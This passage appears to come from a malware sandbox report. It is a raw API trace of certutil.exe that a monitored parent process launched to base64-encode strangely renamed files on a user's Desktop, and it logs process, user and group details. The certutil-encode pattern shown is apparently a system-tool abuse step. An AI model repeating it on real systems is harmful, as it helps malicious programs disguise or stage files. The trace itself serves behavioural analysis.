(Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0206.278] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0206.278] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0206.278] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0206.278] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0206.278] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0206.278] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0206.278] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0206.279] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0206.279] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0206.279] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x20b4d161150 [0206.279] GetComputerNameW (in: lpBuffer=0x20b4d161150, nSize=0x3fd5adf180 | out: lpBuffer="NQDPDE", nSize=0x3fd5adf180) returned 1 [0206.279] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x3fd5adf150 | out: lpBuffer=0x0, nSize=0x3fd5adf150) returned 0 [0206.279] GetLastError () returned 0xea [0206.279] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x20b4d14dc40 [0206.279] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x20b4d14dc40, nSize=0x3fd5adf150 | out: lpBuffer="NQdPdE", nSize=0x3fd5adf150) returned 1 [0206.280] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0206.284] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x20b4d161280, cbCertEncoded=0x10be7) returned 0x0 [0206.288] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x20b4d161280, cbCrlEncoded=0x10be7) returned 0x0 [0206.290] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x20b4d161280, cbEncoded=0x10be7, dwFlags=0x8000, pDecodePara=0x3fd5adf030, pvStructInfo=0x3fd5adf0c0, pcbStructInfo=0x3fd5adf0b4 | out: pvStructInfo=0x3fd5adf0c0, pcbStructInfo=0x3fd5adf0b4) returned 0 [0206.295] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x20b4d161280, cbEncoded=0x10be7, dwFlags=0x8000, pDecodePara=0x3fd5adf030, pvStructInfo=0x3fd5adf0c0, pcbStructInfo=0x3fd5adf0b4 | out: pvStructInfo=0x3fd5adf0c0, pcbStructInfo=0x3fd5adf0b4) returned 0 [0206.296] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x20b4d161280, cbEncoded=0x10be7, dwFlags=0x8000, pDecodePara=0x3fd5adf030, pvStructInfo=0x3fd5adf0c0, pcbStructInfo=0x3fd5adf0b4 | out: pvStructInfo=0x3fd5adf0c0, pcbStructInfo=0x3fd5adf0b4) returned 0 [0206.297] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x20b4d1597a0 [0206.529] CryptMsgUpdate (hCryptMsg=0x20b4d1597a0, pbData=0x20b4d161280, cbData=0x10be7, fFinal=1) returned 0 [0206.529] GetLastError () returned 0x8009310b [0206.529] CryptMsgClose (hCryptMsg=0x20b4d1597a0) returned 1 [0206.529] GetFileAttributesExW (in: lpFileName="0kL8UpxhMP3oFa.avi.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\0kl8upxhmp3ofa.avi.sister"), fInfoLevelId=0x0, lpFileInformation=0x3fd5adf0e0 | out: lpFileInformation=0x3fd5adf0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16f0e7c0, ftCreationTime.dwHighDateTime=0x1d5e81d, ftLastAccessTime.dwLowDateTime=0xb506470, ftLastAccessTime.dwHighDateTime=0x1d5e6fd, ftLastWriteTime.dwLowDateTime=0xb506470, ftLastWriteTime.dwHighDateTime=0x1d5e6fd, nFileSizeHigh=0x0, nFileSizeLow=0x10be7)) returned 1 [0206.530] _vsnwprintf (in: _Buffer=0x3fd5adf0e8, _BufferCount=0xb, _Format="%d", _ArgList=0x3fd5adf0d8 | out: _Buffer="359") returned 3 [0206.530] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x3fd5adeea0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0206.530] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x20b4d160b80 [0206.530] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.531] _vsnwprintf (in: _Buffer=0x3fd5ade0d0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x3fd5adf128 | out: _Buffer="Input Length = 68583") returned 20 [0206.531] GetFileType (hFile=0x50) returned 0x2 [0206.531] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3fd5ade0d0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x3fd5ade084, lpReserved=0x0 | out: lpBuffer=0x3fd5ade0d0*, lpNumberOfCharsWritten=0x3fd5ade084*=0x14) returned 1 [0206.534] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.534] _vsnwprintf (in: _Buffer=0x3fd5ade0d0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x3fd5adf128 | out: _Buffer="\n") returned 1 [0206.534] GetFileType (hFile=0x50) returned 0x2 [0206.534] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3fd5ade0d0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3fd5ade084, lpReserved=0x0 | out: lpBuffer=0x3fd5ade0d0*, lpNumberOfCharsWritten=0x3fd5ade084*=0x1) returned 1 [0206.550] GetFileAttributesExW (in: lpFileName="0kL8UpxhMP3oFa.avi.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\0kl8upxhmp3ofa.avi.cruel"), fInfoLevelId=0x0, lpFileInformation=0x3fd5adf0e0 | out: lpFileInformation=0x3fd5adf0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5b79c32, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xa5b79c32, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa5b8dcf9, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x17096)) returned 1 [0206.550] _vsnwprintf (in: _Buffer=0x3fd5adf0e8, _BufferCount=0xb, _Format="%d", _ArgList=0x3fd5adf0d8 | out: _Buffer="361") returned 3 [0206.550] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x3fd5adeea0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0206.550] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x20b4d160e80 [0206.550] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.550] _vsnwprintf (in: _Buffer=0x3fd5ade0d0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x3fd5adf128 | out: _Buffer="Output Length = 94358") returned 21 [0206.550] GetFileType (hFile=0x50) returned 0x2 [0206.550] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3fd5ade0d0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x3fd5ade084, lpReserved=0x0 | out: lpBuffer=0x3fd5ade0d0*, lpNumberOfCharsWritten=0x3fd5ade084*=0x15) returned 1 [0206.555] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.555] _vsnwprintf (in: _Buffer=0x3fd5ade0d0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x3fd5adf128 | out: _Buffer="\n") returned 1 [0206.555] GetFileType (hFile=0x50) returned 0x2 [0206.555] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3fd5ade0d0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3fd5ade084, lpReserved=0x0 | out: lpBuffer=0x3fd5ade0d0*, lpNumberOfCharsWritten=0x3fd5ade084*=0x1) returned 1 [0206.559] LocalFree (hMem=0x20b4d161280) returned 0x0 [0206.559] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0206.559] _vsnwprintf (in: _Buffer=0x3fd5adf148, _BufferCount=0xb, _Format="%d", _ArgList=0x3fd5adf138 | out: _Buffer="2022") returned 4 [0206.559] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x3fd5adef00, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0206.559] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x20b4d138bf0 [0206.560] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.560] _vsnwprintf (in: _Buffer=0x3fd5ade130, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x3fd5adf188 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0206.560] GetFileType (hFile=0x50) returned 0x2 [0206.560] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3fd5ade130*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x3fd5ade0e4, lpReserved=0x0 | out: lpBuffer=0x3fd5ade130*, lpNumberOfCharsWritten=0x3fd5ade0e4*=0x31) returned 1 [0206.560] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.560] _vsnwprintf (in: _Buffer=0x3fd5ade130, _BufferCount=0x1ff, _Format="\n", _ArgList=0x3fd5adf188 | out: _Buffer="\n") returned 1 [0206.560] GetFileType (hFile=0x50) returned 0x2 [0206.560] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3fd5ade130*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3fd5ade0e4, lpReserved=0x0 | out: lpBuffer=0x3fd5ade130*, lpNumberOfCharsWritten=0x3fd5ade0e4*=0x1) returned 1 [0206.565] LocalFree (hMem=0x0) returned 0x0 [0206.566] LocalFree (hMem=0x20b4d134400) returned 0x0 [0206.566] LocalFree (hMem=0x20b4d13bf50) returned 0x0 [0206.566] SetLastError (dwErrCode=0x80070716) [0206.566] _vsnwprintf (in: _Buffer=0x3fd5adf1b8, _BufferCount=0xb, _Format="%d", _ArgList=0x3fd5adf1a8 | out: _Buffer="511") returned 3 [0206.566] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x3fd5adef70, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0206.566] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x20b4d160f10 [0206.566] PostQuitMessage (nExitCode=0) [0206.566] GetMessageW (in: lpMsg=0x3fd5adf7b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3fd5adf7b0) returned 0 [0206.566] LocalFree (hMem=0x20b4d14dc40) returned 0x0 [0206.566] LocalFree (hMem=0x20b4d161150) returned 0x0 [0206.566] LocalFree (hMem=0x0) returned 0x0 [0206.566] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0206.567] GetLastError () returned 0x7e [0206.567] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0206.567] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0206.567] DllMain () returned 0x1 [0206.567] LocalFree (hMem=0x20b4d14df80) returned 0x0 [0206.567] LocalFree (hMem=0x20b4d1555e0) returned 0x0 [0206.567] LocalFree (hMem=0x20b4d160b80) returned 0x0 [0206.567] LocalFree (hMem=0x20b4d160e80) returned 0x0 [0206.567] LocalFree (hMem=0x20b4d138bf0) returned 0x0 [0206.567] LocalFree (hMem=0x20b4d160f10) returned 0x0 [0206.567] LocalFree (hMem=0x20b4d13c210) returned 0x0 [0206.567] LocalFree (hMem=0x20b4d155580) returned 0x0 [0206.567] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0206.567] GetLastError () returned 0x7e [0206.568] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0206.568] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0206.568] DllMain () returned 0x1 [0206.568] exit (_Code=0) Thread: id = 28 os_tid = 0x12d4 Thread: id = 29 os_tid = 0x12d8 Process: id = "6" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x1d3c9000" os_pid = "0xfe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"1KOAcYCUfFYg9R3cp_.ods.Sister\" \"1KOAcYCUfFYg9R3cp_.ods.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 30 os_tid = 0x1354 [0206.857] GetStartupInfoW (in: lpStartupInfo=0x1d0b87fbf0 | out: lpStartupInfo=0x1d0b87fbf0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"1KOAcYCUfFYg9R3cp_.ods.Sister\" \"1KOAcYCUfFYg9R3cp_.ods.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0206.863] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0206.864] __set_app_type (_Type=0x1) [0206.864] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0206.864] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0206.867] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0206.867] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0206.868] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0206.868] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0206.868] WerSetFlags () returned 0x0 [0206.868] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0206.868] __iob_func () returned 0x7ffcea2dea00 [0206.868] _fileno (_File=0x7ffcea2dea30) returned 1 [0206.869] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0206.869] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0206.870] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0206.870] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0206.870] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0206.871] GetConsoleOutputCP () returned 0x1b5 [0206.871] _vsnwprintf (in: _Buffer=0x1d0b87fb60, _BufferCount=0xb, _Format=".%d", _ArgList=0x1d0b87fa88 | out: _Buffer=".437") returned 4 [0206.872] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0206.872] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.872] GetFileType (hFile=0x50) returned 0x2 [0206.872] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0206.872] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0206.872] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.873] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0206.873] GetCommandLineW () returned="certutil -encode \"1KOAcYCUfFYg9R3cp_.ods.Sister\" \"1KOAcYCUfFYg9R3cp_.ods.Cruel\"" [0206.873] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1c06a8ab620 [0206.873] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1c06a89cb00 [0206.873] LocalFree (hMem=0x1c06a8ab620) returned 0x0 [0206.873] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1c06a8a1c90 [0206.873] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1c06a8a1db0 [0206.873] LocalFree (hMem=0x1c06a8a1c90) returned 0x0 [0206.873] LocalFree (hMem=0x1c06a89cb00) returned 0x0 [0206.873] LocalFree (hMem=0x0) returned 0x0 [0206.874] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0206.874] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0206.874] GetCommandLineW () returned="certutil -encode \"1KOAcYCUfFYg9R3cp_.ods.Sister\" \"1KOAcYCUfFYg9R3cp_.ods.Cruel\"" [0206.874] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1c06a8ab7a0 [0206.875] GetSystemTime (in: lpSystemTime=0x1d0b87f850 | out: lpSystemTime=0x1d0b87f850*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x30, wSecond=0x29, wMilliseconds=0x19f)) [0206.875] SystemTimeToFileTime (in: lpSystemTime=0x1d0b87f850, lpFileTime=0x1d0b87f848 | out: lpFileTime=0x1d0b87f848) returned 1 [0206.875] FileTimeToLocalFileTime (in: lpFileTime=0x1d0b87f848, lpLocalFileTime=0x1d0b87f810 | out: lpLocalFileTime=0x1d0b87f810) returned 1 [0206.875] FileTimeToSystemTime (in: lpFileTime=0x1d0b87f810, lpSystemTime=0x1d0b87f580 | out: lpSystemTime=0x1d0b87f580) returned 1 [0206.875] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x1d0b87f580, lpFormat=0x0, lpDateStr=0x1d0b87f690, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0206.875] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x1d0b87f580, lpFormat=0x0, lpTimeStr=0x1d0b87f590, cchTime=128 | out: lpTimeStr="8:48 PM") returned 8 [0206.875] _vsnwprintf (in: _Buffer=0x1d0b87f59e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x1d0b87f568 | out: _Buffer=" 41.415s") returned 8 [0206.875] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1c06a8ae000 [0206.875] SetLastError (dwErrCode=0x80070716) [0206.875] _vsnwprintf (in: _Buffer=0x1d0b87f618, _BufferCount=0xb, _Format="%d", _ArgList=0x1d0b87f608 | out: _Buffer="948") returned 3 [0206.875] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x1d0b87f3d0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0206.875] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1c06a8ab980 [0206.876] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1c06a89cd50 [0206.876] LocalFree (hMem=0x1c06a8ae000) returned 0x0 [0206.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1d0b87f8c0 | out: lpSystemTimeAsFileTime=0x1d0b87f8c0*(dwLowDateTime=0xa5ea6cbc, dwHighDateTime=0x1d6141f)) [0206.876] GetLocalTime (in: lpSystemTime=0x1d0b87f8f8 | out: lpSystemTime=0x1d0b87f8f8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x30, wSecond=0x29, wMilliseconds=0x19f)) [0206.876] SystemTimeToFileTime (in: lpSystemTime=0x1d0b87f8f8, lpFileTime=0x1d0b87f8d0 | out: lpFileTime=0x1d0b87f8d0) returned 1 [0206.876] CompareFileTime (lpFileTime1=0x1d0b87f8d0, lpFileTime2=0x1d0b87f8c0) returned 1 [0206.876] _vsnwprintf (in: _Buffer=0x1d0b87f908, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x1d0b87f898 | out: _Buffer="GMT + 2.00") returned 10 [0206.876] LocalFree (hMem=0x1c06a8ab7a0) returned 0x0 [0206.876] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffccc870000 [0206.876] FindResourceW (hModule=0x7ffccc870000, lpName=0x1, lpType=0x10) returned 0x7ffccc930090 [0206.877] LoadResource (hModule=0x7ffccc870000, hResInfo=0x7ffccc930090) returned 0x7ffccc9300b0 [0206.877] LockResource (hResData=0x7ffccc9300b0) returned 0x7ffccc9300b0 [0206.877] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0206.877] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x1d0b87f938 | out: _Buffer="10.0.15063.447") returned 14 [0206.877] GetACP () returned 0x4e4 [0206.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0206.877] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c06a8aba40 [0206.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1c06a8aba40, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0206.877] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1c06a8ae000 [0206.877] _vsnwprintf (in: _Buffer=0x1c06a8ae000, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x1d0b87f988 | out: _Buffer="10.0.15063.447 retail415s") returned 21 [0206.877] LocalFree (hMem=0x1c06a8aba40) returned 0x0 [0206.877] LocalFree (hMem=0x0) returned 0x0 [0206.877] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0206.877] GetACP () returned 0x4e4 [0206.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0206.877] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c06a8ab460 [0206.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1c06a8ab460, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0206.877] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1c06a8ae300 [0206.877] _vsnwprintf (in: _Buffer=0x1c06a8ae300, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x1d0b87f988 | out: _Buffer="10.0.15063.447 retail") returned 21 [0206.877] LocalFree (hMem=0x1c06a8ab460) returned 0x0 [0206.877] LocalFree (hMem=0x0) returned 0x0 [0206.878] GetACP () returned 0x4e4 [0206.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0206.878] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c06a8ab820 [0206.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1c06a8ab820, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0206.878] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1c06a8ae480 [0206.878] _vsnwprintf (in: _Buffer=0x1c06a8ae480, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x1d0b87f9b8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0206.878] LocalFree (hMem=0x1c06a8ab820) returned 0x0 [0206.878] LocalFree (hMem=0x1c06a8ae000) returned 0x0 [0206.878] LocalFree (hMem=0x1c06a8ae300) returned 0x0 [0206.878] LocalFree (hMem=0x1c06a8ae480) returned 0x0 [0206.878] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0206.878] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0206.878] GetStockObject (i=0) returned 0x900010 [0206.878] RegisterClassW (lpWndClass=0x1d0b87fae0) returned 0xc1a2 [0206.879] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x60044 [0206.892] NtdllDefWindowProc_W () returned 0x0 [0206.893] NtdllDefWindowProc_W () returned 0x1 [0206.897] NtdllDefWindowProc_W () returned 0x0 [0206.905] UpdateWindow (hWnd=0x60044) returned 1 [0206.905] PostMessageW (hWnd=0x60044, Msg=0x400, wParam=0x0, lParam=0x1c06a89217e) returned 1 [0206.905] GetMessageW (in: lpMsg=0x1d0b87fb30, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x1d0b87fb30) returned 1 [0206.905] TranslateMessage (lpMsg=0x1d0b87fb30) returned 0 [0206.905] DispatchMessageW (lpMsg=0x1d0b87fb30) returned 0x0 [0206.905] NtdllDefWindowProc_W () returned 0x0 [0206.905] GetMessageW (in: lpMsg=0x1d0b87fb30, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x1d0b87fb30) returned 1 [0206.905] TranslateMessage (lpMsg=0x1d0b87fb30) returned 0 [0206.905] DispatchMessageW (lpMsg=0x1d0b87fb30) returned 0x0 [0206.905] LocalAlloc (uFlags=0x0, uBytes=0x8e) returned 0x1c06a894440 [0206.905] LocalAlloc (uFlags=0x0, uBytes=0x9a) returned 0x1c06a89ae80 [0206.905] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0206.905] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0206.906] SetLastError (dwErrCode=0x80070716) [0206.906] _vsnwprintf (in: _Buffer=0x1d0b87f538, _BufferCount=0xb, _Format="%d", _ArgList=0x1d0b87f528 | out: _Buffer="465") returned 3 [0206.906] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x1d0b87f2f0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0206.906] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1c06a8a2050 [0206.906] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0206.906] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0206.906] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x1d0b87f2d0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0206.906] GetLastError () returned 0xcb [0206.906] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0206.906] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0206.906] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0206.906] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0206.907] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0206.907] _wcsnicmp (_String1="Template", _String2="enroll", 